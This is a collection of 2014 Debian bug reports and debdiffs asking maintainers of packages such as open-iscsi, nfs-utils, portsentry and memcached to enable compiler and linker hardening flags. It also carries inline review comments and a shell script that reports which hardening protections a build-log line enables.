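The two points of this report can be checked on build-log lines: `_FORTIFY_SOURCE` does nothing without an optimization level, and upstream and dpkg-buildflags spell the same protections differently. The script below is an added example, not code from this thread or from blhc; the function names and the sample command lines are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the thread: report the effective hardening state
# of one compiler/linker command line as it appears in a build log.
# Function names and the sample lines below are constructed for illustration.

hardening_report() (
    set -f      # do not glob-expand words such as *.o while splitting the line
    fortify=missing optimized=no stackprot=missing
    relro=no bindnow=no compiling=no linking=yes prev=
    for word in $1; do
        case $word in
            -c)                                    linking=no ;;
            *.c|*.cc|*.cpp)                        compiling=yes ;;
            -D_FORTIFY_SOURCE=0|-U_FORTIFY_SOURCE) fortify=missing ;;
            -D_FORTIFY_SOURCE=*)                   fortify=requested ;;
            -O0)                                   optimized=no ;;   # last -O wins
            -O*)                                   optimized=yes ;;
            -fno-stack-protector)                  stackprot=missing ;;
            -fstack-protector)                     stackprot=basic ;;
            -fstack-protector-strong)              stackprot=strong ;;
            -fstack-protector-all)                 stackprot=all ;;
            -Wl,*)
                # dpkg-buildflags spelling: -Wl,-z,relro -Wl,-z,now
                opts=",${word#-Wl,},"
                case $opts in *,-z,relro,*) relro=yes ;; esac
                case $opts in *,-z,now,*)   bindnow=yes ;; esac ;;
            # upstream spelling: "-z relro" and "-z now" as two words
            relro) if [ "$prev" = -z ]; then relro=yes; fi ;;
            now)   if [ "$prev" = -z ]; then bindnow=yes; fi ;;
        esac
        prev=$word
    done
    # _FORTIFY_SOURCE is only effective when the compiler optimises.
    if [ "$fortify" = requested ]; then
        if [ "$optimized" = yes ]; then fortify=active; else fortify=inactive; fi
    fi
    # Compile-time checks only apply when a source file is compiled,
    # link-time checks only when the line actually links (no -c).
    if [ "$compiling" = no ]; then fortify=n/a; stackprot=n/a; fi
    if [ "$linking" = no ]; then relro=n/a; bindnow=n/a; fi
    echo "fortify=$fortify stackprotector=$stackprot relro=$relro bindnow=$bindnow"
)

# List only what a packager still has to fix; an empty line means no gap.
# -fstack-protector-all is accepted: it differs from Debian's
# -fstack-protector-strong but is not a missing protection.
hardening_gaps() {
    gaps=
    for item in $(hardening_report "$1"); do
        case $item in
            fortify=inactive)       gaps="$gaps fortify-without-optimization" ;;
            fortify=missing)        gaps="$gaps fortify" ;;
            stackprotector=missing) gaps="$gaps stack-protector" ;;
            relro=no)               gaps="$gaps relro" ;;
            bindnow=no)             gaps="$gaps bindnow" ;;
        esac
    done
    echo "${gaps# }"
}

# Constructed sample lines modelled on the flags quoted in the report.
UPSTREAM_COMPILE='gcc -DHAVE_CONFIG_H -I. -D_FORTIFY_SOURCE=2 -fno-strict-aliasing -fno-strict-overflow -fstack-protector-all -c ftpd.c'
FIXED_COMPILE='gcc -DHAVE_CONFIG_H -I. -D_FORTIFY_SOURCE=2 -O2 -fstack-protector-all -c ftpd.c'
UPSTREAM_LINK='gcc -z relro -z now -o pure-ftpd ftpd.o'
DEBIAN_LINK='gcc -Wl,-z,relro -Wl,-z,now -o pure-ftpd ftpd.o'
UNHARDENED_LINK='gcc -o pure-ftpd ftpd.o'

for line in "$UPSTREAM_COMPILE" "$FIXED_COMPILE" "$UPSTREAM_LINK" \
            "$DEBIAN_LINK" "$UNHARDENED_LINK"; do
    printf '%s\n  -> %s\n  gaps: %s\n' "$line" \
        "$(hardening_report "$line")" "$(hardening_gaps "$line")"
done
```

Feeding it the real compile and link lines from a package build log shows whether adding `-O2` to CFLAGS actually turned the fortify request into an effective one.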




Bug#764409: Hardening options incomplete

2014-10-07 Thread Guillaume Delacour
Package: open-iscsi
Version: 2.0.873+git0.3b4b4500-4
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening




Hello,

Please consider re-enabling the previously applied
03_hardened-build-flags.patch as open-iscsi is currently not fully hardened:
missing PIE, relro and bindnow. I've just refreshed the patch to add -fPIC to
the open-isns library (see debdiff attached).

diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/changelog open-iscsi-2.0.873+git0.3b4b4500/debian/changelog
--- open-iscsi-2.0.873+git0.3b4b4500/debian/changelog	2014-09-01 11:03:23.0 +0200
+++ open-iscsi-2.0.873+git0.3b4b4500/debian/changelog	2014-10-07 22:48:32.0 +0200
@@ -1,3 +1,11 @@
+open-iscsi (2.0.873+git0.3b4b4500-4.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Re-enable 03_hardened-build-flags.patch and refresh it to enable -dPIC
+to utils/open-isns lib.
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 21 Sep 2014 12:06:00 +0200
+
 open-iscsi (2.0.873+git0.3b4b4500-4) unstable; urgency=medium
 
   * [41c7eca] Introduce new architectures based on current build
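Review bot: the new changelog entry names the flag as `-dPIC`, but the refreshed patch adds `-fPIC` to CFLAGS in utils/open-isns/Makefile.in; correct the spelling so the changelog matches the change. The trailer is also dated Sun, 21 Sep 2014 while the file timestamp in this debdiff is 2014-10-07, so refresh the date before upload.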
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch
--- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch	2014-08-20 15:53:55.0 +0200
+++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch	2014-10-07 22:45:27.0 +0200
@@ -1,9 +1,9 @@
 hardened build flags - wheezy release goal
-Index: open-iscsi/usr/Makefile
+Index: open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile
 ===
 open-iscsi.orig/usr/Makefile	2013-11-05 20:56:40.013418719 +0530
-+++ open-iscsi/usr/Makefile	2013-11-05 20:56:40.009418719 +0530
-@@ -28,7 +28,7 @@
+--- open-iscsi-2.0.873+git0.3b4b4500.orig/usr/Makefile
 open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile
+@@ -28,7 +28,7 @@ IPC_OBJ=ioctl.o
  endif
  endif
  
@@ -12,7 +12,7 @@
  WARNFLAGS ?= -Wall -Wstrict-prototypes
  CFLAGS += $(OPTFLAGS) $(WARNFLAGS) -I../include -I. -I../utils/open-isns \
  -D$(OSNAME) $(IPC_CFLAGS)
-@@ -55,14 +55,14 @@
+@@ -55,14 +55,14 @@ all: $(PROGRAMS)
  
  iscsid: $(ISCSI_LIB_SRCS) $(INITIATOR_SRCS) $(DISCOVERY_SRCS) \
  	iscsid.o session_mgmt.o discoveryd.o
@@ -30,10 +30,10 @@
  clean:
  	rm -f *.o $(PROGRAMS) .depend $(LIBSYS)
  
-Index: open-iscsi/utils/Makefile
+Index: open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile
 ===
 open-iscsi.orig/utils/Makefile	2013-11-05 20:56:40.013418719 +0530
-+++ open-iscsi/utils/Makefile	2013-11-05 20:56:40.009418719 +0530
+--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/Makefile
 open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile
 @@ -1,12 +1,12 @@
  # This Makefile will work only with GNU make.
  
@@ -49,3 +49,16 @@
  
  clean:
  	rm -f *.o $(PROGRAMS) .depend
+Index: open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in
+===
+--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/open-isns/Makefile.in
 open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in
+@@ -13,7 +13,7 @@ VARDIR	= $(INSTALL_ROOT)$(vardir)
+ 
+ CC	= @CC@
+ CPPFLAGS= @CPPFLAGS@
+-CFLAGS	= @CFLAGS@ -I.
++CFLAGS	= @CFLAGS@ -I. -fPIC
+ LDFLAGS	= @LDFLAGS@
+ 
+ LIB	= libisns.a
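Review bot: `-fPIC` is appended unconditionally to `CFLAGS = @CFLAGS@ -I.` in the new utils/open-isns/Makefile.in section, and the patch header still only reads "hardened build flags - wheezy release goal". Add a line to the header saying why the static libisns.a needs position-independent objects (presumably so it can be linked into the PIE binaries), so the reason survives the next refresh of this patch.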
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series
--- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series	2014-08-20 15:53:55.0 +0200
+++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series	2014-10-07 21:42:37.0 +0200
@@ -1,4 +1,5 @@
 01_spelling-errors-and-manpage-hyphen-fixes.patch
 02_make-iscsistart-a-dynamic-binary.patch
+03_hardened-build-flags.patch
 04_fix_iscsi_path.patch
 05-disable-iscsiuio.patch
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/rules open-iscsi-2.0.873+git0.3b4b4500/debian/rules
--- open-iscsi-2.0.873+git0.3b4b4500

Bug#756906: nfs-utils: please use more hardening features

2014-10-04 Thread Guillaume Delacour
Hello,

Applying the attached seems to be sufficient to enable hardened build
flags. Maybe interesting to enable PIE and BINDNOW too.
diff -Nru nfs-utils-1.2.8/debian/rules nfs-utils-1.2.8/debian/rules
--- nfs-utils-1.2.8/debian/rules	2014-08-13 02:12:43.0 +0200
+++ nfs-utils-1.2.8/debian/rules	2014-10-04 16:34:06.0 +0200
@@ -1,8 +1,11 @@
 #! /usr/bin/make -f
 
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
+
 # Parsing of DEB_BUILD_OPTIONS flags.
 # Note that nostrip is handled automatically by debhelper.
-CFLAGS := -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \
+CFLAGS += -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \
 		-DGSSD_PIPEFS_DIR=\\\/run/rpc_pipefs\\\
 
 ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS)))
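Review bot: with `CFLAGS +=` stacked on top of buildflags.mk, the `noopt` block that starts on the last context line now runs after dpkg-buildflags has already chosen the optimization level, so any `-O` flag it appends will duplicate or override that choice; check the block and drop what dpkg-buildflags already handles. The `-g` kept on the `CFLAGS +=` line is likewise already part of the dpkg-buildflags defaults, and the hunk does not show whether the exported CPPFLAGS and LDFLAGS reach the upstream build.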




Bug#763687: Please enable hardened build flags

2014-10-02 Thread Guillaume Delacour
On Thu, Oct 02, 2014 at 10:14:16PM +0200, folkert wrote:
  Package: multitail
  Please enable hardening build flags on your package; adding:
  DPKG_EXPORT_BUILDFLAGS = 1
  include /usr/share/dpkg/buildflags.mk
 
 Are there any indications that multitail has security problems?

Not particular ones, but enabling *FLAGS (which contain security hardening
flags now) is a release goal and maybe good for future recompilation
archive compiler options. The priority is to enable flags to network
daemons, DSA, priority or important and interpreters packages and later
on the whole archive.

 
 
 Folkert van Heusden
 
 -- 
 You've probably gotten really fed up with never winning in the Mega-
 Millions lottery. Well, cry no longer: www.smartwinning.info tells you
 everything that might help you deciding what numbers to choose. With
 nice graphs and pretty animations!
 --

-- 
Guillaume Delacour




Bug#763687: Please enable hardened build flags

2014-10-01 Thread Guillaume Delacour
Package: multitail
Version: 6.2.1-1
Severity: important
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening




Hello,

Please enable hardening build flags on your package; adding:
DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk

in debian/rules is sufficient in the current package state, or will be automatic
if you switch to debhelper version >= 9. I've made some tests after building
multitail with hardened flags and encountered no problem at this time.

More information available about hardening flags:
https://wiki.debian.org/ReleaseGoals/SecurityHardeningBuildFlags




Bug#763154: Hardening options incomplete: missings CPPFLAGS and LDFLAGS

2014-09-28 Thread Guillaume Delacour
Package: postfix-gld
Version: 1.7-5
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

As you previously enabled CFLAGS, I've just refreshed your patch
debian/patches/01 to pass {CPP,LD}FLAGS to make in debian/rules and
updated upstream Makefile.in to use them.
I don't use postfix-gld, so it may need more intensive tests than I've
made.

diff -Nru postfix-gld-1.7/debian/changelog postfix-gld-1.7/debian/changelog
--- postfix-gld-1.7/debian/changelog	2014-03-16 16:53:11.0 +0100
+++ postfix-gld-1.7/debian/changelog	2014-09-28 11:13:08.0 +0200
@@ -1,3 +1,10 @@
+postfix-gld (1.7-5.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Refresh debian/patches/01 to pass CPPFLAGS and LDFLAGS to gcc calls
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 28 Sep 2014 11:06:30 +0200
+
 postfix-gld (1.7-5) unstable; urgency=medium
 
   * Fixed typo in README.Debian.
diff -Nru postfix-gld-1.7/debian/patches/01 postfix-gld-1.7/debian/patches/01
--- postfix-gld-1.7/debian/patches/01	2010-04-19 00:09:12.0 +0200
+++ postfix-gld-1.7/debian/patches/01	2014-09-28 11:12:46.0 +0200
@@ -1,8 +1,11 @@
 From: Santiago Vila sanv...@debian.org
 Subject: Changed Makefile.in to support DEB_BUILD_OPTIONS
+Last-Update: 2014-09-28
 
 a/Makefile.in
-+++ b/Makefile.in
+Index: postfix-gld-1.7/Makefile.in
+===
+--- postfix-gld-1.7.orig/Makefile.in
 postfix-gld-1.7/Makefile.in
 @@ -1,23 +1,24 @@
  all: gld
  
@@ -11,27 +14,27 @@
  gld: cnf.o server.o sql.o sockets.o greylist.o gld.h
 -	@CC@ -O2 @DEFS@ -Wall server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld
 -	strip gld
-+	@CC@ $(CFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld
++	@CC@ $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld
  
  sockets.o: sockets.c sockets.h
 -	@CC@ -O2 @DEFS@ -Wall -c sockets.c
-+	@CC@ $(CFLAGS) @DEFS@ -c sockets.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c sockets.c
  
  cnf.o: cnf.c gld.h
 -	@CC@ -O2 @DEFS@ -Wall -c cnf.c
-+	@CC@ $(CFLAGS) @DEFS@ -c cnf.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c cnf.c
  
  greylist.o: greylist.c gld.h
 -	@CC@ -O2 @DEFS@ -Wall -c greylist.c
-+	@CC@ $(CFLAGS) @DEFS@ -c greylist.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c greylist.c
  
  server.o: server.c gld.h
 -	@CC@ -O2 @DEFS@ -Wall -c server.c
-+	@CC@ $(CFLAGS) @DEFS@ -c server.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c server.c
  
  sql.o: sql.c
 -	@CC@ -O2 @DEFS@ @SQL_CFLAGS@ -Wall -c sql.c
-+	@CC@ $(CFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c
  
  clean:
  	rm -f  gld *.o
diff -Nru postfix-gld-1.7/debian/rules postfix-gld-1.7/debian/rules
--- postfix-gld-1.7/debian/rules	2014-03-15 12:00:00.0 +0100
+++ postfix-gld-1.7/debian/rules	2014-09-28 11:15:49.0 +0200
@@ -16,7 +16,7 @@
 
 build:
 	./configure --prefix=/usr --with-$(DATABASE)
-	$(MAKE) CFLAGS=$(CFLAGS)
+	$(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS)
 	touch build
 
 clean:
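
Review bot: The build line passes CPPFLAGS=$(CPPFLAGS) and LDFLAGS=$(LDFLAGS) to make, but nothing in this diff shows debian/rules setting either variable. If the file only defines CFLAGS, both expand to nothing and the fortify and relro flags never reach Makefile.in. Confirm they are populated from dpkg-buildflags earlier in the file, for example through an include of /usr/share/dpkg/buildflags.mk, and check one compile line and the link line in a build log.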


Bug#763158: Hardening options incomplete: missings CPPFLAGS and LDFLAGS

2014-09-28 Thread Guillaume Delacour
Package: portsentry
Version: 1.2-13
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch
attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -Nru portsentry-1.2/debian/changelog portsentry-1.2/debian/changelog
--- portsentry-1.2/debian/changelog	2012-01-14 15:28:24.0 +0100
+++ portsentry-1.2/debian/changelog	2014-09-28 11:34:24.0 +0200
@@ -1,3 +1,11 @@
+portsentry (1.2-13.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass {CPP,LD}FLAGS to make and patch upstream
+Makefile to use them
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 28 Sep 2014 11:29:22 +0200
+
 portsentry (1.2-13) unstable; urgency=low
 
   * Switch to dpkg-source 3.0 (quilt) format
diff -Nru portsentry-1.2/debian/patches/01_dpkg-buildflags.patch portsentry-1.2/debian/patches/01_dpkg-buildflags.patch
--- portsentry-1.2/debian/patches/01_dpkg-buildflags.patch	1970-01-01 01:00:00.0 +0100
+++ portsentry-1.2/debian/patches/01_dpkg-buildflags.patch	2014-09-28 11:40:10.0 +0200
@@ -0,0 +1,17 @@
+Author: Guillaume Delacour g...@iroqwa.org
+Description: Patch upstream Makefile to use {CPP,LD}FLAGS
+Last-Update: 2014-09-28
+
+Index: portsentry-1.2/Makefile
+===
+--- portsentry-1.2.orig/Makefile
 portsentry-1.2/Makefile
+@@ -107,7 +107,7 @@ linux:
+ debian-linux:		
+ 		SYSTYPE=debian-linux 
+ 		@echo Making $(SYSTYPE)
+-		$(CC) $(CFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \
++		$(CC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \
+ 		./portsentry_io.c ./portsentry_util.c $(LIBS)
+ 
+ 
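
Review bot: The DEP-3 header of 01_dpkg-buildflags.patch has Author, Description and Last-Update but no Forwarded field. The change edits the debian-linux rule of the upstream Makefile rather than Debian packaging, so state whether it was sent upstream or is Debian-specific (Forwarded: no, or not-needed), so that whoever refreshes the patch next knows whether it has to keep being carried.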
diff -Nru portsentry-1.2/debian/patches/series portsentry-1.2/debian/patches/series
--- portsentry-1.2/debian/patches/series	2012-01-14 15:27:18.0 +0100
+++ portsentry-1.2/debian/patches/series	2014-09-28 11:33:41.0 +0200
@@ -2,3 +2,4 @@
 00_fix_portsentry.c.patch
 00_fix_README.install.patch
 00_fix_Makefile.patch
+01_dpkg-buildflags.patch
diff -Nru portsentry-1.2/debian/rules portsentry-1.2/debian/rules
--- portsentry-1.2/debian/rules	2012-01-14 15:27:18.0 +0100
+++ portsentry-1.2/debian/rules	2014-09-28 11:41:07.0 +0200
@@ -9,6 +9,9 @@
 # Uncomment this to turn on verbose mode.
 export DH_VERBOSE=1
 
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
+
 DEST=`pwd`/debian/`dh_listpackages`
 ETCDIR=$(DEST)/etc/portsentry
 PPP=$(DEST)/etc/ppp
@@ -17,13 +20,8 @@
 
 INSTALL=install
 INSTALL_PROGRAM = $(INSTALL) -p -o root -g root -m 755
-CFLAGS=-Wall -g
+CFLAGS+=-Wall
 
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-CFLAGS += -O0
-else
-CFLAGS += -O2
-endif
 ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS)))
 INSTALL_PROGRAM += -s
 endif
@@ -42,7 +40,7 @@
 	dh_testdir
 
 	# Add here commands to compile the package.
-	$(MAKE) CFLAGS=$(CFLAGS) -f Makefile debian-linux 
+	$(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -f Makefile debian-linux 
 
 	touch build-stamp
 


Bug#763180: Hardening options incomplete: missing CFLAGS

2014-09-28 Thread Guillaume Delacour
Package: ahcpd
Version: 0.53-2
Severity: normal
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

The upstream Makefile overwrites the CFLAGS variable exported by
dpkg-buildflags (which is -g -O2 -fstack-protector-strong -Wformat
-Werror=format-security).
Please find attached a patch that fixes that.

diff -Nru ahcpd-0.53/debian/changelog ahcpd-0.53/debian/changelog
--- ahcpd-0.53/debian/changelog	2013-05-26 21:11:53.0 +0200
+++ ahcpd-0.53/debian/changelog	2014-09-28 15:08:19.0 +0200
@@ -1,3 +1,10 @@
+ahcpd (0.53-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Patch upstream Makefile to not overwrite dpkg-buildflags CFLAGS
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 28 Sep 2014 15:02:21 +0200
+
 ahcpd (0.53-2) unstable; urgency=low
 
   * Add logrotate support
diff -Nru ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff
--- ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff	1970-01-01 01:00:00.0 +0100
+++ ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff	2014-09-28 15:05:30.0 +0200
@@ -0,0 +1,17 @@
+Author Guillaume Delacour g...@iroqwa.org
+Description: Don't overwrite dpkg-buildflags CFLAGS
+Last-Update: 2014-09-28
+
+Index: ahcpd-0.53/Makefile
+===
+--- ahcpd-0.53.orig/Makefile
 ahcpd-0.53/Makefile
+@@ -4,7 +4,7 @@ CDEBUGFLAGS = -Os -g -Wall
+ 
+ DEFINES = $(PLATFORM_DEFINES)
+ 
+-CFLAGS = $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES)
++CFLAGS += $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES)
+ 
+ SRCS = ahcpd.c monotonic.c transport.c prefix.c configure.c config.c lease.c
+ 
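
Review bot: Switching `CFLAGS =` to `CFLAGS +=` appends $(CDEBUGFLAGS), which the hunk header shows as `-Os -g -Wall`, so `-Os` lands after the -O2 (or the -O0 of a noopt build) coming from dpkg-buildflags and, as the last -O option on the command line, wins. If that is not intended, drop `-Os` from CDEBUGFLAGS in the same patch or have debian/rules pass CDEBUGFLAGS=-Wall to make. The patch header also reads `Author Guillaume Delacour` without a colon, so DEP-3 tools will not parse that field.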
diff -Nru ahcpd-0.53/debian/patches/series ahcpd-0.53/debian/patches/series
--- ahcpd-0.53/debian/patches/series	1970-01-01 01:00:00.0 +0100
+++ ahcpd-0.53/debian/patches/series	2014-09-28 15:06:39.0 +0200
@@ -0,0 +1 @@
+01_dont_overwrite_cflags.diff


Bug#763183: Please enable hardened build flags

2014-09-28 Thread Guillaume Delacour
Package: arp-scan
Version: 1.8.1-2
Severity: normal
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

Upstream already compiles arp-scan with the -fstack-protector,
-D_FORTIFY_SOURCE=2 and -Wformat -Wformat-security gcc flags (but LDFLAGS
relro is missing); the use of dpkg-buildflags is recommended as it exports
all Debian hardening *FLAGS automatically. You can just use it at the top
of debian/rules:

DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk

Or switch to debhelper 9 to enable this automatically.





Bug#763184: FTBFS with -Werror=format-security

2014-09-28 Thread Guillaume Delacour
Source: cfengine3
Version: 3.2.4-2+nmu1
Severity: important
User: debian...@lists.debian.org
Usertags: hardening-format-security hardening


Hello,

Cfengine fails to build with dpkg-buildflags hardened flags,
particularly with the -Werror=format-security CFLAGS (build log attached).

The buildflags were not used in your package; I've just added this to
debian/rules to see the failure:

DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk






Bug#733588: memcached: Please update to new upstream version (1.4.20)

2014-09-25 Thread Guillaume Delacour
Unless David emits objections, I've packaged [1] the new upstream release
and fixed all bugs in the PTS (and also fixed the build for the arm64 port);
I've had to use debhelper 9 and dh_autoreconf to easily build this version
without repacking it, and to provide a systemd script.

I've also filled the git collab-maint repository on alioth [2] (which was
created empty in January this year) with the actual version in sid,
version 1.4.20 and my Debian-related changes.

[1]:
http://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.4.20-0.1.dsc
[2]: http://anonscm.debian.org/cgit/collab-maint/memcached.git/

-- 
Guillaume Delacour g...@iroqwa.org




Bug#733588: memcached: Please update to new upstream version (1.4.17)

2014-09-22 Thread Guillaume Delacour
Hi,

As the new upstream release 1.4.20 is available, I've proposed my help to
David to provide a new upstream release and try to fix as many BTS bugs as
possible.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#543626: memcached.log show event_add messages

2014-09-22 Thread Guillaume Delacour
Hello,

This is apparently fixed since upstream release 1.4.6 (fix race crash
for accepting new connections). Sorry for the late answer.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#762331: Hardening options incomplete (CPPFLAGS, LDFLAGS)

2014-09-21 Thread Guillaume Delacour
Package: ifplugd
Version: 0.28-19
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch
attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -u ifplugd-0.28/debian/changelog ifplugd-0.28/debian/changelog
--- ifplugd-0.28/debian/changelog
+++ ifplugd-0.28/debian/changelog
@@ -1,3 +1,10 @@
+ifplugd (0.28-19.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to configure
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 21 Sep 2014 10:09:39 +0200
+
 ifplugd (0.28-19) unstable; urgency=low
 
   * Added interface poll delay  1sec using the new -T option. (Closes:
diff -u ifplugd-0.28/debian/rules ifplugd-0.28/debian/rules
--- ifplugd-0.28/debian/rules
+++ ifplugd-0.28/debian/rules
@@ -4,19 +4,14 @@
 #export DH_VERBOSE=1
 
 include /usr/share/dpatch/dpatch.make
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
 
 # These are used for cross-compiling and for saving the configure script
 # from having to guess our platform (since we know it already)
 DEB_HOST_GNU_TYPE   ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE)
 DEB_BUILD_GNU_TYPE  ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE)
 
-CFLAGS = -Wall -g
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
 ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS)))
 	INSTALL_PROGRAM += -s
 endif
@@ -36,7 +31,7 @@
 	cp -f /usr/share/misc/config.guess config.guess
 endif
 	[ ! -f doc/README.html ] || mv -f doc/README.html doc/README.html.ups
-	./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) LDFLAGS=-Wl,-z,defs $(confopts)
+	./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -Wl,-z,defs $(confopts)
 	touch $@
 
 build: build-stamp
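
Review bot: On the new configure line `-Wl,-z,defs` comes after `LDFLAGS=$(LDFLAGS)`; as the line reads here it is a separate word rather than part of the LDFLAGS value, so configure would receive it as a stray argument and the link would lose the undefined-symbol check the old line had. Keep both in one quoted assignment, for example by appending `-Wl,-z,defs` to LDFLAGS right after the buildflags.mk include, and quote the CFLAGS and CPPFLAGS values too, since each expands to several flags.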


Bug#762336: Please enable hardened build flags

2014-09-21 Thread Guillaume Delacour
Source: bandwidthd
Version: 2.0.1+cvs20090917-7
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -Nru bandwidthd-2.0.1+cvs20090917/debian/changelog bandwidthd-2.0.1+cvs20090917/debian/changelog
--- bandwidthd-2.0.1+cvs20090917/debian/changelog	2013-07-20 18:25:40.0 +0200
+++ bandwidthd-2.0.1+cvs20090917/debian/changelog	2014-09-21 10:39:48.0 +0200
@@ -1,3 +1,10 @@
+bandwidthd (2.0.1+cvs20090917-7.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to configure
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 21 Sep 2014 10:27:23 +0200
+
 bandwidthd (2.0.1+cvs20090917-7) unstable; urgency=low
 
   * Move php5-gd to Recommends and also recommend php5 (Closes: #717042)
diff -Nru bandwidthd-2.0.1+cvs20090917/debian/rules bandwidthd-2.0.1+cvs20090917/debian/rules
--- bandwidthd-2.0.1+cvs20090917/debian/rules	2013-06-14 00:41:25.0 +0200
+++ bandwidthd-2.0.1+cvs20090917/debian/rules	2014-09-21 10:28:19.0 +0200
@@ -6,6 +6,9 @@
 # Uncomment this to turn on verbose mode.
 #export DH_VERBOSE=1
 
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
+
